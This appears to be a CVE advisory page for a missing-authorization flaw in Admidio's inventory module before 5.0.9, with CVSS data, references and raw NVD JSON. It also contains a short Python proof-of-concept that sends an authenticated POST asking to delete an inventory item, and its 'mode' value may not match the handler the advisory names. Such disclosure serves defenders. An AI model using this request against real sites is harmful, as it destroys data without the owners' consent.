Security Vulnerability Report
CVE-2026-41658 CVSS 6.5 MEDIUM

CVE-2026-41658

Published: 2026-05-07 04:16:29
Last Modified: 2026-05-07 15:16:08

Description

Admidio is an open-source user management solution. Prior to version 5.0.9, the Admidio inventory module enforces authorization for destructive operations (delete, retire, reinstate) only in the UI layer by conditionally rendering buttons. The backend POST handlers at modules/inventory.php for item_delete, item_retire, item_reinstate, item_picture_upload, item_picture_save, and item_picture_delete perform CSRF validation but never check whether the requesting user is an inventory administrator. Any authenticated user who can access the inventory module can permanently delete any inventory item and all its associated data. This issue has been patched in version 5.0.9.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
Weakness
CWE-862 (Missing Authorization)

Configurations (Affected Products)

No CPE configuration data available. Affected versions per the advisory: Admidio < 5.0.9.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2026-41658 PoC Concept
# Target: Admidio < 5.0.9
# Description: Exploit access control bypass in inventory module to delete items.
# Note: This requires a valid authenticated session (cookie) and CSRF token.

target_url = "http://target-admidio-site/admidio/modules/inventory.php"
session_cookie = "PHPSESSID=attacker_session_id"  # Replace with valid session
# Note: CSRF token needs to be extracted from the page or previous requests if enforced
csrf_token = "valid_csrf_token_from_page"

# Payload to delete an inventory item
payload = {
    "mode": "delete",
    "item_id": "1",  # The ID of the item to delete
    "csrf_token": csrf_token,
}

headers = {
    "Cookie": session_cookie,
    "Content-Type": "application/x-www-form-urlencoded",
}

response = requests.post(target_url, data=payload, headers=headers)
if response.status_code == 200:
    print("Request sent. Check if item was deleted.")
else:
    print(f"Failed with status code: {response.status_code}")
```

References

https://github.com/Admidio/admidio/releases/tag/v5.0.9
https://github.com/Admidio/admidio/security/advisories/GHSA-xqv4-xm7h-52cv

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-41658", "sourceIdentifier": "[email protected]", "published": "2026-05-07T04:16:29.407", "lastModified": "2026-05-07T15:16:08.150", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Admidio is an open-source user management solution. Prior to version 5.0.9, the Admidio inventory module enforces authorization for destructive operations (delete, retire, reinstate) only in the UI layer by conditionally rendering buttons. The backend POST handlers at modules/inventory.php for item_delete, item_retire, item_reinstate, item_picture_upload, item_picture_save, and item_picture_delete perform CSRF validation but never check whether the requesting user is an inventory administrator. Any authenticated user who can access the inventory module can permanently delete any inventory item and all its associated data. This issue has been patched in version 5.0.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://github.com/Admidio/admidio/releases/tag/v5.0.9", "source": "[email protected]"}, {"url": "https://github.com/Admidio/admidio/security/advisories/GHSA-xqv4-xm7h-52cv", "source": "[email protected]"}, {"url": "https://github.com/Admidio/admidio/security/advisories/GHSA-xqv4-xm7h-52cv", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
```